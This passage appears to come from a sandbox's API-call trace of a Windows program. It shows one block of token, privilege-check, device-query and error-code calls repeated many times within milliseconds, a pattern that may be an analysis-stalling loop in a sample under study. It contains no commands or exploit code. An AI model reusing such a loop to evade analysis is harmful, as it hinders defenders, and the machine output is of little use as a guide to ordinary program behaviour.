InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.726] GetLastError () returned 0x578 [0084.726] SetLastError (dwErrCode=0x578) [0084.726] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.726] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.726] GetCurrentThread () returned 0xfffffffe [0084.726] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.726] GetLastError () returned 0x3f0 [0084.726] GetCurrentProcess () returned 0xffffffff [0084.726] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.726] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.727] SetLastError (dwErrCode=0x522) [0084.727] CloseHandle (hObject=0x114) returned 1 [0084.727] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.727] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.727] GetLastError () returned 0x578 [0084.727] SetLastError (dwErrCode=0x578) [0084.727] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.727] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.727] GetCurrentThread () returned 0xfffffffe [0084.727] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.727] GetLastError () returned 0x3f0 [0084.727] GetCurrentProcess () returned 0xffffffff [0084.727] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.727] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.727] SetLastError (dwErrCode=0x522) [0084.727] CloseHandle (hObject=0x114) returned 1 [0084.727] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.727] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.727] GetLastError () returned 0x578 [0084.727] SetLastError (dwErrCode=0x578) [0084.727] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.727] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.727] GetCurrentThread () returned 0xfffffffe [0084.727] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.727] GetLastError () returned 0x3f0 [0084.727] GetCurrentProcess () returned 0xffffffff [0084.727] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.727] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.727] SetLastError (dwErrCode=0x522) [0084.727] CloseHandle (hObject=0x114) returned 1 [0084.727] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.727] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.727] GetLastError () returned 0x578 [0084.727] SetLastError (dwErrCode=0x578) [0084.727] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.727] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.727] GetCurrentThread () returned 0xfffffffe [0084.727] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.728] GetLastError () returned 0x3f0 [0084.728] GetCurrentProcess () returned 0xffffffff [0084.728] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.728] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.728] SetLastError (dwErrCode=0x522) [0084.728] CloseHandle (hObject=0x114) returned 1 [0084.728] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.728] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.728] GetLastError () returned 0x578 [0084.728] SetLastError (dwErrCode=0x578) [0084.728] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.728] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.728] GetCurrentThread () returned 0xfffffffe [0084.728] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.728] GetLastError () returned 0x3f0 [0084.728] GetCurrentProcess () returned 0xffffffff [0084.728] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.728] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.728] SetLastError (dwErrCode=0x522) [0084.728] CloseHandle (hObject=0x114) returned 1 [0084.728] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.728] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.728] GetLastError () returned 0x578 [0084.728] SetLastError (dwErrCode=0x578) [0084.728] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.728] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.728] GetCurrentThread () returned 0xfffffffe [0084.728] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.728] GetLastError () returned 0x3f0 [0084.728] GetCurrentProcess () returned 0xffffffff [0084.728] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.728] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.728] SetLastError (dwErrCode=0x522) [0084.728] CloseHandle (hObject=0x114) returned 1 [0084.728] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.728] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.728] GetLastError () returned 0x578 [0084.728] SetLastError (dwErrCode=0x578) [0084.728] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.729] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.729] GetCurrentThread () returned 0xfffffffe [0084.729] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.729] GetLastError () returned 0x3f0 [0084.729] GetCurrentProcess () returned 0xffffffff [0084.729] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.729] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.729] SetLastError (dwErrCode=0x522) [0084.729] CloseHandle (hObject=0x114) returned 1 [0084.729] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.729] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.729] GetLastError () returned 0x578 [0084.729] SetLastError (dwErrCode=0x578) [0084.729] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.729] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.729] GetCurrentThread () returned 0xfffffffe [0084.729] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.729] GetLastError () returned 0x3f0 [0084.729] GetCurrentProcess () returned 0xffffffff [0084.729] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.729] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.729] SetLastError (dwErrCode=0x522) [0084.729] CloseHandle (hObject=0x114) returned 1 [0084.729] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.729] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.729] GetLastError () returned 0x578 [0084.729] SetLastError (dwErrCode=0x578) [0084.729] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.729] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.729] GetCurrentThread () returned 0xfffffffe [0084.729] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.729] GetLastError () returned 0x3f0 [0084.729] GetCurrentProcess () returned 0xffffffff [0084.729] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.729] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.729] SetLastError (dwErrCode=0x522) [0084.729] CloseHandle (hObject=0x114) returned 1 [0084.729] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.729] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.729] GetLastError () returned 0x578 [0084.729] SetLastError (dwErrCode=0x578) [0084.729] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.729] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.730] GetCurrentThread () returned 0xfffffffe [0084.730] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.730] GetLastError () returned 0x3f0 [0084.730] GetCurrentProcess () returned 0xffffffff [0084.730] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.730] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.730] SetLastError (dwErrCode=0x522) [0084.730] CloseHandle (hObject=0x114) returned 1 [0084.730] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.730] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.730] GetLastError () returned 0x578 [0084.730] SetLastError (dwErrCode=0x578) [0084.730] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.730] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.730] GetCurrentThread () returned 0xfffffffe [0084.730] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.730] GetLastError () returned 0x3f0 [0084.730] GetCurrentProcess () returned 0xffffffff [0084.730] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.730] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.730] SetLastError (dwErrCode=0x522) [0084.730] CloseHandle (hObject=0x114) returned 1 [0084.730] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.730] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.730] GetLastError () returned 0x578 [0084.730] SetLastError (dwErrCode=0x578) [0084.730] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.730] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.730] GetCurrentThread () returned 0xfffffffe [0084.730] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.730] GetLastError () returned 0x3f0 [0084.730] GetCurrentProcess () returned 0xffffffff [0084.730] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.730] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.730] SetLastError (dwErrCode=0x522) [0084.730] CloseHandle (hObject=0x114) returned 1 [0084.730] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.730] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.730] GetLastError () returned 0x578 [0084.731] SetLastError (dwErrCode=0x578) [0084.731] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.731] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.731] GetCurrentThread () returned 0xfffffffe [0084.731] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.731] GetLastError () returned 0x3f0 [0084.731] GetCurrentProcess () returned 0xffffffff [0084.731] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.731] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.731] SetLastError (dwErrCode=0x522) [0084.731] CloseHandle (hObject=0x114) returned 1 [0084.731] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.731] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.731] GetLastError () returned 0x578 [0084.731] SetLastError (dwErrCode=0x578) [0084.731] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.731] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.731] GetCurrentThread () returned 0xfffffffe [0084.731] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.731] GetLastError () returned 0x3f0 [0084.731] GetCurrentProcess () returned 0xffffffff [0084.731] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.731] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.731] SetLastError (dwErrCode=0x522) [0084.731] CloseHandle (hObject=0x114) returned 1 [0084.731] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.731] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.731] GetLastError () returned 0x578 [0084.731] SetLastError (dwErrCode=0x578) [0084.731] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.731] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.731] GetCurrentThread () returned 0xfffffffe [0084.731] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.731] GetLastError () returned 0x3f0 [0084.731] GetCurrentProcess () returned 0xffffffff [0084.731] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.731] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.731] SetLastError (dwErrCode=0x522) [0084.731] CloseHandle (hObject=0x114) returned 1 [0084.732] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.732] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.732] GetLastError () returned 0x578 [0084.732] SetLastError (dwErrCode=0x578) [0084.732] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.732] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.732] GetCurrentThread () returned 0xfffffffe [0084.732] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.732] GetLastError () returned 0x3f0 [0084.732] GetCurrentProcess () returned 0xffffffff [0084.732] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.732] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.732] SetLastError (dwErrCode=0x522) [0084.732] CloseHandle (hObject=0x114) returned 1 [0084.732] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.732] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.732] GetLastError () returned 0x578 [0084.732] SetLastError (dwErrCode=0x578) [0084.732] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.732] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.732] GetCurrentThread () returned 0xfffffffe [0084.732] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.732] GetLastError () returned 0x3f0 [0084.732] GetCurrentProcess () returned 0xffffffff [0084.732] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.732] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.732] SetLastError (dwErrCode=0x522) [0084.732] CloseHandle (hObject=0x114) returned 1 [0084.732] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.732] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.732] GetLastError () returned 0x578 [0084.732] SetLastError (dwErrCode=0x578) [0084.732] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.732] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.732] GetCurrentThread () returned 0xfffffffe [0084.732] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.732] GetLastError () returned 0x3f0 [0084.732] GetCurrentProcess () returned 0xffffffff [0084.732] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.733] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.733] SetLastError (dwErrCode=0x522) [0084.733] CloseHandle (hObject=0x114) returned 1 [0084.733] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.733] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.733] GetLastError () returned 0x578 [0084.733] SetLastError (dwErrCode=0x578) [0084.733] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.733] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.733] GetCurrentThread () returned 0xfffffffe [0084.733] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.733] GetLastError () returned 0x3f0 [0084.733] GetCurrentProcess () returned 0xffffffff [0084.733] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.733] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.733] SetLastError (dwErrCode=0x522) [0084.733] CloseHandle (hObject=0x114) returned 1 [0084.733] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.733] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.733] GetLastError () returned 0x578 [0084.733] SetLastError (dwErrCode=0x578) [0084.733] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.733] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.733] GetCurrentThread () returned 0xfffffffe [0084.733] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.733] GetLastError () returned 0x3f0 [0084.733] GetCurrentProcess () returned 0xffffffff [0084.733] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.733] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.733] SetLastError (dwErrCode=0x522) [0084.733] CloseHandle (hObject=0x114) returned 1 [0084.733] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.733] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.733] GetLastError () returned 0x578 [0084.733] SetLastError (dwErrCode=0x578) [0084.733] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.733] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.733] GetCurrentThread () returned 0xfffffffe [0084.734] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.734] GetLastError () returned 0x3f0 [0084.734] GetCurrentProcess () returned 0xffffffff [0084.734] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.734] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.734] SetLastError (dwErrCode=0x522) [0084.734] CloseHandle (hObject=0x114) returned 1 [0084.734] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.734] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.734] GetLastError () returned 0x578 [0084.734] SetLastError (dwErrCode=0x578) [0084.734] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: 